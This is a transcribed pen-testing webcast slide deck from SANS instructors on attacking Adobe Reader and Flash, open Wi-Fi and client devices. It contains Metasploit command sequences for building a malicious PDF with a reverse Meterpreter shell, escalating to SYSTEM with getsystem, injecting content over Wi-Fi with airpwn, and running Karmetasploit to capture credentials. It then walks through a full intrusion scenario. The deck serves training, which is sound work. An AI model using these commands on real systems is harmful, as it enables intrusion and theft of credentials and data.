The Pen Test Perfect Storm Part 5: We Love Adobe!



Similar documents
The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part 2

The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part 2

The Pen Test Perfect Storm: We Love Microsoft! Pen Test Techniques Part 4

How To Hack A Network With A Network Security Attack On A Web Browser (For A Free Download) (For Free) ( For A Free) On A Network) (On A Free Downloaded) (Or For A Paid Download) On An Ip

Pen Testing Perfect Storm Part , InGuardians 1

Kautilya: Teensy beyond shells

Penetration Testing Walkthrough

AUTHOR CONTACT DETAILS

Lab 7 - Exploitation 1. NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy

How We're Getting Creamed

Penetration Testing Report Client: Business Solutions June 15 th 2015

Exploiting Transparent User Identification Systems

Course Duration: 80Hrs. Course Fee: INR (Certification Lab Exam Cost 2 Attempts)

Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security Sans Mentor: Daryl Fallin

Metasploit Lab: Attacking Windows XP and Linux Targets

INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION

Penetration Testing with Kali Linux

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

1. LAB SNIFFING LAB ID: 10

Attack and Penetration Testing 101

Actuality of SMBRelay in Modern Windows Networks

Workshop. From XSS to Domain Admin. Black Hat Sessions 18 juni 2015 Jordy Kersten - Mandy van Oosterhout - Ward Wouts

Metasploit Framework Unleashed beyond Metasploit

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

Mass Pwnage 4 Dummies. Latest pen-testing tricks using Metasploit

The Prevalence of Flash Vulnerabilities on the Web

How to hack a website with Metasploit

Automated Penetration Testing with the Metasploit Framework. NEO Information Security Forum March 19, 2008

Penetration Testing Ninjitsu 2: Crouching Netcat, Hidden Vulnerabilities. By Ed Skoudis

Web Application Penetration Testing

Vulnerability Assessment and Penetration Testing

Automation of Post-Exploitation

Threat Intelligence Pty Ltd Specialist Security Training Catalogue

FREQUENTLY ASKED QUESTIONS

The Trivial Cisco IP Phones Compromise

Penetration Testing - a way for improving our cyber security

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

Attacking Automatic Wireless Network Selection. Dino A. Dai Zovi and Shane A. Macaulay

Social Engineering Toolkit

NCS 430 Penetration Testing Lab #2 Tuesday, February 10, 2015 John Salamy

Ethical Hacking as a Professional Penetration Testing Technique

Real World Web Service Testing For Web Hackers

Criteria for web application security check. Version

ECE 4893: Internetwork Security Lab 12: Web Security

A New Era. A New Edge. Phishing within your company

Targeted attacks: Tools and techniques

CIT 480: Securing Computer Systems. Vulnerability Scanning and Exploitation Frameworks

Metasploit Pro Getting Started Guide

MWR InfoSecurity Security Advisory. BT Home Hub SSID Script Injection Vulnerability. 10 th May Contents

The Top Web Application Attacks: Are you vulnerable?

THE SMARTEST WAY TO PROTECT WEBSITES AND WEB APPS FROM ATTACKS

Networking for Caribbean Development

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant

Learn Ethical Hacking, Become a Pentester

New Avatars of Honeypot Attacks on WiFi Networks

Application security testing: Protecting your application and data

How I Learned to Stop Worrying and Love Compliance Ron Gula, CEO Tenable Network Security

Vulnerability analysis

Virtual Learning Tools in Cyber Security Education

RMAR Technologies Pvt. Ltd.

Metasploit Unleashed. Class 2: Information Gathering and Vulnerability Scanning. Georgia Weidman Director of Cyberwarface, Reverse Space

Pwning Intranets with HTML5

Protecting Your Organisation from Targeted Cyber Intrusion

ITEC441- IS Security. Chapter 15 Performing a Penetration Test

Lab Configuring Access Policies and DMZ Settings

How To Use Powerhell For Security Research

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

Post Exploitation. n00bpentesting.com

Rational AppScan & Ounce Products

The Pen Test Perfect Storm: We Love Cisco! Pen Test Techniques Part 6

Anatomy of an ethical penetration test

Enumerating and Breaking VoIP

The Social-Engineer Toolkit (SET)

Still Aren't Doing. Frank Kim

Web Application Hacking (Penetration Testing) 5-day Hands-On Course


Recommended Practice Case Study: Cross-Site Scripting. February 2007

Metasploit ing the target machine is a fascinating subject to all security professionals. The rich list of exploit codes and other handy modules of

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

INFORMATION SECURITY TRAINING CATALOG (2015)

Networks and Security Lab. Network Forensics

University of Wisconsin Platteville SE411. Senior Seminar. Web System Attacks. Maxwell Friederichs. April 18, 2013

SAP: Session (Fixation) Attacks and Protections

Client logo placeholder XXX REPORT. Page 1 of 37

Deep Security Intrusion Detection & Prevention (IDS/IPS) Coverage Statistics and Comparison

6WRUP:DWFK. Policies for Dedicated IIS Web Servers Group. V2.1 policy module to restrict ALL network access

Penetration Testing in Romania

APT Advanced Persistent Threat Time to rethink?

Proxies. Chapter 4. Network & Security Gildas Avoine

Where every interaction matters.

CYBERTRON NETWORK SOLUTIONS

Quick Start Guide to Ethical Hacking

Using Nessus In Web Application Vulnerability Assessments

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Security Tools - Hands On

Andreas Dittrich, Philipp Reinecke Testing of Network and System Security. example.

The Risks that Pen Tests don t Find. OWASP 13 April The OWASP Foundation

Cross Site Scripting in Joomla Acajoom Component

Transcription:

The Pen Test Perfect Storm Part 5: We Love Adobe! By Ed Skoudis, Kevin Johnson, & Joshua Wright Hosted by Alex Horan of Core Copyright 2010, All Rights Reserved Version 1.0 1

Outline The Power of Combined Attacks Network Attack Tools and Techniques Web Client Attack Tools and Techniques Wireless Attack Tools and Techniques Combining It All Together A Scenario Conclusions and Q&A 2

Previously on MacGyver To recap, in Parts 1-3 of this trilogy, we discussed how penetration tests and testers are categorized: 1) Network tests 2) Web application tests 3) Wireless tests 4) Others, but those are the biggies We also proposed that if you want to be a great pen tester make sure you can pivot between network pen tests, web app tests, and wireless pen tests Furthermore, integrate these attack vectors together into a much more powerful combined attack To procure great pen tests, specify combined tests 3

In the Last Episode Episode 4 was our homage to Microsoft products, subtitled "We love Microsoft!" We discussed various ways to "use" Microsoft products Sharepoint, SMB, Windows wireless feature and more We also explored a scenario combining the web, network attacks, and wireless features But, we love other vendors, too! Slides from all of the previous episodes are available at: http://www.willhackforsushi.com/?page_id=137 4

Outline The Power of Combined Attacks Network Attack Tools and Techniques Web Client Attack Tools and Techniques Wireless Attack Tools and Techniques Combining It All Together A Scenario Conclusions and Q&A 5

Adobe Vulns: Surveying the Wreckage Adobe Reader, Acrobat, and Flash, are quite often vulnerable Download Manager, Shockwave, Illustrator, and ColdFusion are also targets Crazy product nesting Reader has a Flash player in it Uninstall Flash, but leave Reader, and Flash exploits still work! In June 2009, Adobe officially moved to a quarterly patching cycle, timed to coincide with Microsoft Patch Tuesday Looking at their history, they seemed to have bumped this to Thursdays Frequent out-of-cycle patches released Consider just Adobe Reader patches: 6/9/09, 7/30/09, 10/8/09, 1/7/10, 2/11/10, 2/23/10, 4/8/10, 6/4/10, 6/24/10, 8/19/10 In May 2010, Adobe announced it was "considering" a monthly cycle For many Adobe vulns, zero-day exploits are available before patch And, even without zero-day, it is extremely difficult for admins to keep up Metasploit exploits are plentiful msf > search -t exploit adobe [*] Searching loaded modules for pattern 'adobe'... Exploits from for Windows targets. ======== Name Rank Description multi/fileformat/adobe_u3d_meshcont good Adobe U3D CLODProgressiveMeshDeclaration Array Overrun windows/browser/adobe_flatedecode_predictor02 good Adobe FlateDecode <snip> Over 16 different exploits to choose 6

Exploiting the Wreckage msf > use exploit/windows/fileformat/adobe_libtiff msf exploit(adobe_libtiff) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(adobe_libtiff) > set LHOST 10.1.1.81 msf exploit(adobe_libtiff) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.pdf yes The file name. OUTPUTPATH /tmp/msf_latest/exploits yes The location of the file. msf exploit(adobe_libtiff) > exploit Once created, malicious PDFs and Flash objects can be delivered in a multitude of ways get clever Pen tester's web site Phishing e-mail Target's own web site (consider help desk functionality) Social Networking sites (there, Kevin) Intranet file server USB tokens left in front lobby (not parking lot) Use reverse connection because we don't know for sure where our exploit might land. The awesome Social Engineering Toolkit (SET) by David Kennedy (ReL1K) is awesome for automating these two options. Wireless Magick (Josh Wright enters the bullpen) 7

Meterpreter getsystem Command But, wait suppose exploited user doesn't have admin privs First off, realize that you can do a whole lot without admin privs Or, use Meterpreter's getsystem command, which supports various techniques for gaining SYSTEM privs selectable with -t <N> 0: Apply all techniques until one succeeds (default) 4: Abuse kernel support for 16-bit apps (MS10-015 from Feb 2010 almost _never_ patched. WE STILL LOVE YOU TOO, MICROSOFT!) Surely, many more techniques for priv escalation will be incorporated msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 10.1.1.81 msf exploit(handler) > exploit <snip> [*] Meterpreter session 1 opened (10.1.1.81:4444 -> 10.11.12.89:1133) meterpreter > getuid Server username: WEBSERVER\Bob meterpreter > use priv Loading extension priv...success. meterpreter > getsystem...got system (via technique 4). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > The getsystem command is part of the priv module, which is NOT loaded automatically unless you have admin or SYSTEM privs during exploitation. So, we manually load it It also provides "hashdump" command. 8

Outline The Power of Combined Attacks Network Attack Tools and Techniques Web Client Attack Tools and Techniques Wireless Attack Tools and Techniques Combining It All Together A Scenario Conclusions and Q&A 9

Flash Cross Domain Flash objects are able to make HTTP requests Many developers use this to provide mash-up capabilities Or to process data from the server application Flash uses a different policy to control this than JavaScript Browser's Same Origin policy for JavaScript is ignored by Flash By default, Flash behaves in a similar way to JavaScript though These restrictions were added in Flash 7 Prevents loading data from any server except the origin server Similar to the Same Origin policy The big difference is that it is server controllable crossdomain.xml file, most likely in the web root, controls this policy Configured by the server admin or developer 10

Abusing Flash Objects We exploit Flash by abusing this request feature Against sites with misconfigured crossdomain files Flash objects can be used to proxy requests through a victim browser Multiple tools are available Weaponized Flash project http://sourceforge.net/projects/weaponizedflash MalaRIA http://github.com/eoftedal/malaria-proxy Target Web Server Target User MalaRIA Server Attacker proxies through Flash object on the target user's browser 11

Using MalaRIA The proxy server runs on the attacker's server The Flash object is served to a victim browser The current version is not subtle! The attacker configs their browser to use MalaRIA proxy Requests are sent through proxy to the Flash object in victim's browser This allows the attacker to browse internal sites as the victim MalaRIA proxy running on Attacker's Server Victim's Browser acting as upstream proxy 12

Outline The Power of Combined Attacks Network Attack Tools and Techniques Web Client Attack Tools and Techniques Wireless Attack Tools and Techniques Combining It All Together A Scenario Conclusions and Q&A 13

Much Love for Open Wireless Many reasons for wanting to deliver Adobe-related content to browsers (more on this in a minute) Open wireless networks represent a simple opportunity to inject arbitrary HTML content Nicely integrated into a Metasploit auxiliary module # svn co http://802.11ninja.net/svn/lorcon # cd lorcon/trunk ;./configure && make && make install # cd ruby-lorcon ; ruby extconf.rb && make && make install && ldconfig # cd /opt/metasploit/msf3 #./msfconsole msf > use auxiliary/spoof/wifi/airpwn msf auxiliary(airpwn) > set RESPONSE <html><object><embed src="countdown.swf" width="100%" height="100%" /></object></html> RESPONSE => <html><object><embed src=countdown.swf width=100% height=100% /></object></html> msf auxiliary(airpwn) > exploit [*] AIRPWN: Parsing responses and defining headers [*] AIRPWN: Response packet has no HTTP headers, creating some. [*] Opening wifi module. [*] AIRPWN: 172.16.0.110 -> 66.102.7.99 HTTP GET [/files/racket/src/doc/] TCP SEQ 542050816 14

What the Browser Sees More fun stuff at TheCleverest.com 15

Exploiting Secure Wireless Infrastructure Open networks are not always available Alternative: Exploit client devices with Karmetasploit "I'm every network"* XP SP3 and later reject advertised networks with mismatched security Also accommodates passive network discovery for enhanced privacy We can impersonate open networks in the client PNL, but must guess their presence WiGLE.net publishes top 100 list of SSID's * For the Joshua Wright adaptation of Chaka Khan's classic, "I'm Every Woman", see http://www.willhackforsushi.com/every.mp3 16

Wireless Network Searching Karmetasploit: "I'll reply to any probe request" Karmetasploit: "I'll reply to any probe request" Karmetasploit with Chaka Kahn: "I'll reply to any probe request" and beacon for common SSID's linksys attwifi 1 tmobile DoS: RF jamming, deauth flood or other means. Probe: hhonors hhonors SSID: "CORP" 2 Win XP SP3 or later Win XP SP3 or later 3 Finish Connection Win XP SP3 or later Client does not search for networks, because it already has a connection to a preferred network. Client still does not probe for networks, because it has not seen any beacons matching PNL entries. Attacker can lure victim by sending beacons for open networks, guessing SSIDs to match common PNL entries. 17

Simplified Karmetasploit Carlos Perez wrote a script to simplify running Karmetasploit on BT4/BT4 R1 Includes Chaka Kahn Metasploit module (with updated MSF, "ssidlist" module) www.darkoperator.com/tools-and-scripts/karmetasploit.tar.gz Command-line options to specify attack surface Capture plaintext/ssl passwords for HTTP, FTP, Telnet, IMAP, POP3, SMTP Capture SMB credentials Browser Autopwn For more effective pen tests, manipulate the custom website instead of using Browser Autopwn Load custom Flash, Adobe, Shockwave content in victim browser "/opt/metasploit3/msf3/data/exploits/capture/http" on BT4/BT4 R1 # apt-get install r8187-drivers # rmmod rtl8187 mac80211 ; modprobe r8187 #./karmetasploit.rb -i wlan0 l /tmp s attwifi o all 18

2 Airbase launches, responding to any probe requests to lure clients 3 Tcpdump session gives you live content during the attack 1 4 Metasploit launches You start exploits and credentialstealing modules, karmetasploit.rb logging to database Can use another window to launch DoS, or modify Carlos' script to automate attack. 19

Outline The Power of Combined Attacks Network Attack Tools and Techniques Web Client Attack Tools and Techniques Wireless Attack Tools and Techniques Combining It All Together A Scenario Conclusions and Q&A 20

Scenario: Attracting Wireless Clients Pen Tester Win Server Corp AP Internet Target Network with unpatched Adobe Reader Firewall Infrastructure MalaRIA Controller 1 Invoke karmetasploit.rb. Pen Tester 2 Chaka Khan starts beaconing. with fully patched Flash 21

Scenario: Interact with Wireless Clients Pen Tester Win Server Corp AP Internet Firewall Infrastructure 3 Target Network Clients probe & then connect to pen tester's machine. with unpatched Adobe Reader MalaRIA Controller Pen Tester with fully patched Flash 22

Scenario: Planting a Fistful of Evil Pen Tester Win Server Corp AP Evil PDF Internet Target Network with unpatched Adobe Reader MalaRIA Controller Firewall Infrastructure Pen Tester Based on client capabilities, deliver Flash object and Reader exploit. with fully patched Flash 23 4 Evil Flash

Scenario: Flash is Our Friend Pen Tester Win Server Corp AP Evil PDF MalaRIA Controller Internet Wireless pen tester leaves to get tasty sushi dinner. 5 Firewall Infrastructure Pen Tester Target Network Flash object connects to MalaRIA server. 6 Clients rejoin corp wireless network. with unpatched Adobe Reader with fully patched Flash 24 7 Evil Flash

Scenario: Proxy Through Client Looking for Target Servers Pen Tester Win Server Corp AP Evil PDF Internet Target Network with unpatched Adobe Reader MalaRIA Controller 8 Pen tester uses MalaRIA to proxy through victim browser, looking for common corporate intranet sites. Firewall Infrastructure Evil Flash with fully patched Flash 25

Scenario: SQL Server and a User Assist Pen Tester Win Server Corp AP 10 User views evil PDF. Evil PDF Internet Target Network with unpatched Adobe Reader 9 Pen tester discovers SQL server on internal network. Firewall Infrastructure Evil Flash MalaRIA Controller with fully patched Flash 26

Scenario: Meterpreter Action Pen Tester Win Server 11 Reader exploit makes connection, & loads Meterpreter. Corp AP Evil PDF Internet Target Network with unpatched Adobe Reader Firewall Infrastructure Evil Flash MalaRIA Controller with fully patched Flash 27

Scenario: Escalate Privs and Upload Database Query Tool Pen Tester Win Server 12 Pen tester loads priv, runs getsystem, and uploads osql.exe. Corp AP Evil PDF Internet Target Network with unpatched Adobe Reader Firewall Infrastructure Evil Flash MalaRIA Controller with fully patched Flash 28

Scenario: Success! Pen Tester Win Server 13 Pen tester queries target database, gains access to all kinds of data. Corp AP Evil PDF Internet Target Network with unpatched Adobe Reader Firewall Infrastructure Evil Flash MalaRIA Controller with fully patched Flash 29

Outline The Power of Combined Attacks Network Attack Tools and Techniques Web Client Attack Tools and Techniques Wireless Attack Tools and Techniques Combining It All Together A Scenario Conclusions and Q&A 30

Conclusions Combined attack vectors allow for much greater flexibility and attack opportunities in a penetration test Even when we're focused on exploiting a specific vendor's technology While more accurately reflecting an attacker's ability to exploit the network and systems Adobe software has become pervasive for most organizations Threats for organizations throughout much of the Adobe product line Many opportunities for penetration testers In Part VI of this webcast trilogy, we ll look at additional attack vectors focusing on Cisco technology 31

Upcoming SANS Course Offerings SANS 560: Network Pen Testing and Ethical Hacking Las Vegas, Sept. 20: Skoudis Chicago, Oct. 25: Shewmaker Washington DC, Dec. 10: Strand SANS 542: Web App Pen Testing and Ethical Hacking Las Vegas, Sept. 20: Johnson London, Nov. 27: Siles vlive! Online, Starting Dec. 6: Johnson, Misenar SANS 580: Metasploit Kung Fu for Enterprise Pen Testing Las Vegas, Sept. 26: Skoudis vlive! Online, Starting Oct. 4: Strand Washington DC, Dec. 17: Strand SANS 617:Wireless Pen Testing and Ethical Hacking Las Vegas, Sept. 20: Wright New Orleans, Jan. 20 2011: Wright SANS 660: Advanced Pen Testing, Exploits, and Ethical Hacking London, Nov. 29: Sims More SEC660 sessions coming to a conference near you in 2011 32